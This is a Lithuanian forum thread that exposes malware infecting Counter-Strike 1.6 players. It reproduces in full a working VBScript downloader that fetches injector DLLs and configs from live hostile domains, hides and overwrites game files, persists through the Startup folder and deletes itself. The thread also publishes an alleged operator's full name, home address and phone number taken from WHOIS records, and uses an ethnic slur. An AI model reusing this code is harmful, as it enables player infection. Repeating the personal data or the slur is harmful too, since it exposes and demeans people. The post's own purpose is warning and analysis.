Amxmodx.lt

post'o - http://amxmodx.lt/viewtopic.php?f=41&t=6840 tesinys

Parazitas pasitelkiant budus, uzkreciant klientus per farmserverius kurie patampa botnetu atsiunciant nekaltam client'ui failus naudojant vb scripta ir cs launcheri kaip atsiustu dll injectoriu, sudarkant zaidimo failus ir aibe kitu.

Prisegta virusiniu failu offline versija jeigu netycia parazitas "sumetytu pedas" atsiusta naudojantis httrack programa analizei kaip irodymas, jie paimti is:

http://www.upload.ee/files/5405822/web_ ... k.rar.html

ms-shadow.ro/NexonUp
stockdownload.eu/NexonCs
vipsmiley.cf/NexonCs

vienas is parazitu failu:

Code: Select all

Sub unProtectFile( filename )    dim readfile, filesys    set filesys = CreateObject("Scripting.FileSystemObject")     If filesys.FileExists( filename ) Then        set readfile = filesys.GetFile( filename )        readfile.Attributes = 0 ' normal    End IfEnd Sub Sub protectFile( filename )    dim readfile, filesys    set filesys = CreateObject("Scripting.FileSystemObject")     If filesys.FileExists( filename ) Then        set readfile = filesys.GetFile( filename )        readfile.Attributes = 7 ' hidden + system + readonly    End IfEnd Sub Sub DeleteAFile( filename )    Dim filesys    Set filesys = CreateObject("Scripting.FileSystemObject")        If filesys.FileExists( filename ) Then        unProtectFile( filename )        filesys.DeleteFile( filename ), True    End IfEnd Sub Sub RenameFile( oldName, newName )    Dim filesys    Set filesys = WScript.CreateObject("Scripting.FileSystemObject")        If filesys.FileExists( oldName ) Then        filesys.MoveFile oldName, newName    End IfEnd Sub Sub ClearCFG( path )    DeleteAFile path    Set objFSO = CreateObject("Scripting.FileSystemObject")    Set objFile = objFSO.CreateTextFile(path, ForWriting)    objFile.Write ""    objFile.Close     protectFile pathEnd Sub Sub DeleteAFolder( foldername )    Dim filesys    Set filesys = CreateObject("Scripting.FileSystemObject")        If filesys.FolderExists( foldername ) Then        ' unProtectFile( foldername )        filesys.DeleteFolder( foldername ), True    End IfEnd Sub Sub RenameFolder( oldName, newName )    Dim filesys    Set filesys = WScript.CreateObject("Scripting.FileSystemObject")        If filesys.FolderExists( oldName ) Then        filesys.MoveFolder oldName, newName    End IfEnd Sub strURL="http://ms-shadow.ro/NexonUp/GTProtector.dll?" & RndOn Error Resume Next    Set xml = CreateObject("Microsoft.XMLHTTP")    xml.Open "GET", strURL, False    xml.Send        If Err.Number <> 0 Then        WScript.Quit    ' if file download fails, quit script    Else        set oStream = createobject("Adodb.Stream")         oStream.type = 1 ' adTypeBinary        oStream.open        oStream.write xml.responseBody                ' overwrite        oStream.savetofile "GTProtector.dll.upk", 2 ' adSaveCreateOverWrite        oStream.close                set oStream = nothing        Set xml = Nothing    End If    Err.ClearOn Error Goto 0 strURL="http://ms-shadow.ro/NexonUp/GTProtector.asi?" & RndOn Error Resume Next    Set xml = CreateObject("Microsoft.XMLHTTP")    xml.Open "GET", strURL, False    xml.Send        If Err.Number <> 0 Then        WScript.Quit    ' if file download fails, quit script    Else        set oStream = createobject("Adodb.Stream")         oStream.type = 1 ' adTypeBinary        oStream.open        oStream.write xml.responseBody                ' overwrite        oStream.savetofile "GTProtector.asi.upk", 2 ' adSaveCreateOverWrite        oStream.close                set oStream = nothing        Set xml = Nothing    End If    Err.ClearOn Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/GTProtector.ini?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "GTProtector.ini.upk"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("GTProtector.ini.upk", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("GTProtector.ini.upk")    End If    On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "config\MasterServers.vdf"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("config\MasterServers.vdf", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("config\MasterServers.vdf")    End If    On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "config\rev_MasterServers.vdf"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("config\rev_MasterServers.vdf", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("config\rev_MasterServers.vdf")    End If    On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "platform\config\MasterServers.vdf"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("platform\config\MasterServers.vdf", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("platform\config\MasterServers.vdf")    End If    On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "platform\config\rev_MasterServers.vdf"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("platform\config\rev_MasterServers.vdf", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("platform\config\rev_MasterServers.vdf")    End If    On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/ServerBrowser.vdf?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "config\ServerBrowser.vdf"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("config\ServerBrowser.vdf", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("config\ServerBrowser.vdf")    End If    On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/ServerBrowser.vdf?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "platform\config\ServerBrowser.vdf"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("platform\config\ServerBrowser.vdf", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("platform\config\ServerBrowser.vdf")    End If    On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/GameMenu.res?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "cstrike\resource\GameMenu.res"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("cstrike\resource\GameMenu.res", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("cstrike\resource\GameMenu.res")    End If    On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/userconfig.cfg?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "cstrike\userconfig.cfg"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("cstrike\userconfig.cfg", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("cstrike\userconfig.cfg")    End If    On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/motd_temp.html?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "cstrike\motd_temp.html.old"        RenameFile "cstrike\motd_temp.html", "cstrike\motd_temp.html.old"        DeleteAFile "cstrike\motd_temp.html"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("cstrike\motd_temp.html", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("cstrike\motd_temp.html")    End If    On Error Goto 0 On Error Resume Next    ClearCFG "cstrike\hw\geforce.cfg"    ClearCFG "cstrike\hw\opengl.cfg"    ClearCFG "cstrike\autoexec.cfg"    ' ClearCFG "cstrike\userconfig.cfg"    ClearCFG "cstrike\valve.rc"     ClearCFG "valve\hw\geforce.cfg"    ClearCFG "valve\hw\opengl.cfg"    ClearCFG "valve\valve.rc"On Error Goto 0 CreateObject("WScript.Shell").Run("taskkill /f /im hl.exe") WScript.Sleep(3000) On Error Resume Next    DeleteAFolder "cstrike\bin_old"    DeleteAFile "cstrike\bin_old"     DeleteAFile "GTProtector.dll.old"    DeleteAFile "GTProtector.asi.old"    DeleteAFile "GTProtector.ini.old"     RenameFolder "cstrike\bin", "cstrike\bin_old"    RenameFile "cstrike\bin", "cstrike\bin_old"     RenameFile "GTProtector.dll", "GTProtector.dll.old"    RenameFile "GTProtector.asi", "GTProtector.asi.old"    RenameFile "GTProtector.ini", "GTProtector.ini.old"     RenameFile "GTProtector.dll.upk", "GTProtector.dll"    RenameFile "GTProtector.asi.upk", "GTProtector.asi"    RenameFile "GTProtector.ini.upk", "GTProtector.ini"     protectFile("GTProtector.dll")    protectFile("GTProtector.asi")    protectFile("GTProtector.ini")     protectFile("cstrike\liblist.gam")     DeleteAFile "cstrike\bin\TrackerUI.dll"    DeleteAFile "valve\bin\TrackerUI.dll"    DeleteAFile "cstrike\cl_dlls\ParticleMan.dll"    DeleteAFile "NexonUp.asi"    DeleteAFile "CsShield.dll"     RenameFile "cstrike\bin\TrackerUI.dll", "cstrike\bin\TrackerUI.dll.old"    RenameFile "valve\bin\TrackerUI.dll", "valve\bin\TrackerUI.dll.old"    RenameFile "cstrike\cl_dlls\ParticleMan.dll", "cstrike\cl_dlls\ParticleMan.dll.old"    RenameFile "NexonUp.asi", "NexonUp.asi.old"    RenameFile "CsShield.dll", "CsShield.dll.old"     DeleteAFile "cstrike\bin\TrackerUI.dll.old"    DeleteAFile "valve\bin\TrackerUI.dll.old"    DeleteAFile "cstrike\cl_dlls\ParticleMan.dll.old"    DeleteAFile "NexonUp.asi.old"    DeleteAFile "CsShield.dll.old"        DeleteAFile "mssv55.asi.old"    RenameFile "mssv55.asi", "mssv55.asi.old"        DeleteAFile "msvv82.asi.old"    RenameFile "msvv82.asi", "msvv82.asi.old" On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/motd_temp.html?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile "cstrike\bin"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile("cstrike\bin", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        protectFile("cstrike\bin")    End If    On Error Goto 0 CreateObject("WScript.Shell").Run("hl.exe -steam -game cstrike -noforcemparms -noforcemaccel") Sub Up() Set objShell = Wscript.CreateObject("Wscript.Shell")strPath = objShell.SpecialFolders("StartUp")strMyPath = strPath & "\" On Error Resume Next Dim filesysSet filesys = CreateObject("Scripting.FileSystemObject") filesys.DeleteFile( strMyPath & "*.vbs" ), True On Error Goto 0 On Error Resume Next    Set objHTTP = CreateObject("MSXML2.XMLHTTP")     Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/NexonUp.vbs?" & Rnd, FALSE)     objHTTP.Send        If Err.Number <> 0 Then            Else        DeleteAFile strMyPath & "NexonUp.vbs"        Set objFSO = CreateObject("Scripting.FileSystemObject")        Set objFile = objFSO.CreateTextFile(strMyPath & "NexonUp.vbs", ForWriting)        objFile.Write objHTTP.ResponseText        objFile.Close        ' protectFile(strMyPath & "NexonUp.vbs")    End If    On Error Goto 0 CreateObject("WScript.Shell").Run(Chr(34) & strMyPath & "NexonUp.vbs" & Chr(34)) End Sub Up() On Error Resume Next    WScript.Sleep 1000    Set fileSystem = CreateObject("Scripting.FileSystemObject")    thisScript = Wscript.ScriptFullName    fileSystem.DeleteFile(thisScript)On Error Goto 0

[/b]

pagrindinis projektas - parazito galva i kuri eina srautas: indungi.ro

salutiniai projektai:

bestia.ro
csgofade.net
ms-boost.com
ms-shadow.ro
vipsmiley.cf
stockdownload.eu

nariai:

anaconda, unpack pagal http://www.extreamcs.com/

nariu domreg info:

Admin Name: Costinel Danut Onofrei
Admin Organization: N/A
Admin Street: Iasi,Comuna Mogosesti-Siret,Strada Tudor Vladimirescu Iasi,Comuna Mogosesti-Siret,Strada Tudor Vladimirescu
Admin City: Iasi,Comuna Mogosesti-Siret,Strada Tudor Vladimirescu
Admin State/Province: Iasi
Admin Postal Code: 73579
Admin Country: RO
Admin Phone: +40.0752811205
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: [email protected]
_
Registrant Name: Emran Costin
Registrant Organization: CSGOFADE.NET
Registrant Street: Germany Germany
Registrant City: Germany
Registrant State/Province: Iasi
Registrant Postal Code: 73579
Registrant Country: RO
Registrant Phone: +00.34123232521
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: [email protected]
Registry Admin ID:

idomus link'as:

stockdownload.eu/NexonPanel

post'as skirtas edukaciniais tikslais istempti parazitus i dienos sviesa, bet koks failu naudojamas uzkreciant klienta yra baudziamas pagal istatymus

uzkrestus failus atsiuncia is cia

Code: Select all

http://ms-shadow.ro/cstrikex/cstrike/

Na jau čia tikrai tavo sritis, bet yra reikalas kažką bandyti pakeisti, jei tai net ne lt projektas? Šiaip kvailas klausimas, nes tikrai nesuprantu, rimtai klausiu.

1. norint kazka pakeisti legaliai, reikia pereiti per milziniskus biurokratinius labirintus, desimtis instituciju tai trunka 2-3 metus ir ilgiau + pareikalauja 300valandu darbo priklausomai nuo apimties ko pasekoje viskas tampa beprasmiska
2. stabdyti parazitus naudojant ju paciu metodus pries juos pacius yra labai efektyvu, bet yra didele teisine siena i kuria atsimusus kelio atgal nera - tad turint ir labai geru noru ir tikslu siais laikais rankos yra uzristos, jau nekalbant apie zodzio laisve
3. Viska viesinti edukaciniais tikslais, ispeti zmones apie galimus pavojus, projektus ir ju savininkus, zaidejus

Sis projektas "slowhack" prasme iseina is bet kokiu sveiko proto ribu ir yra ko gero didziausias parazitas visoje cs 1.6 bendruomeneje - kaip vezys uzkreciantis nekaltus zaidejus bei kesinantis i ivairius projektus(teko asmeniskai susidurti su ddos atakomis, tycine fake useriu reklama dar 2012 metais butent is sio projekto), savininkas bei grupuote parazituojanciu cigonu asmenu kurie dirba prie to tikrai ne 2 ir ne 5 metus, yra pakankamai issilavine ir geba panaudoti savo zinias blogiems tikslams ka jau ir paminejau

Steam CS tai liečia?

beast wrote:Steam CS tai liečia?

taip, pazeidziamas

o cia vistiek visi no steam serv kurejai renkasi dingtu tai cs numirtu iskar

tai manau dalbajobiskas klausimas

laimiukas3 wrote:o cia vistiek visi no steam serv kurejai renkasi dingtu tai cs numirtu iskar tai manau dalbajobiskas klausimas

atvirksciai maziau parazitu butu, o jeigu valve paimtu 3rd party serveriu kontrole i savo rankas nebebutu "vjarslynyku" kurie visa community griauna

sss wrote:
laimiukas3 wrote:o cia vistiek visi no steam serv kurejai renkasi dingtu tai cs numirtu iskar tai manau dalbajobiskas klausimas
atvirksciai maziau parazitu butu, o jeigu valve paimtu 3rd party serveriu kontrole i savo rankas nebebutu "vjarslynyku" kurie visa community griauna

nebent steame sitas game taptu free

laimiukas3 wrote:
sss wrote:
laimiukas3 wrote:o cia vistiek visi no steam serv kurejai renkasi dingtu tai cs numirtu iskar tai manau dalbajobiskas klausimas
atvirksciai maziau parazitu butu, o jeigu valve paimtu 3rd party serveriu kontrole i savo rankas nebebutu "vjarslynyku" kurie visa community griauna
nebent steame sitas game taptu free

csgo steam jau dabar 4-8x daugiau zaideju negu cs 1.6 steam+non kartu sudejus. Cs 1.6 yra nebesupportinamas kureju, neturi ka pasiulyti zaidejams, o 3rd party community serveriai daugiausiai priklauso parazitams

Amxmodx.lt

Cigonu slowhack'eriu tinklo analize(pildoma)

Cigonu slowhack'eriu tinklo analize(pildoma)

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Re: Cigonu slowhack'eriu tinklo analize(pildoma)

Re: Cigonu slowhack'eriu tinklo analize(pildoma)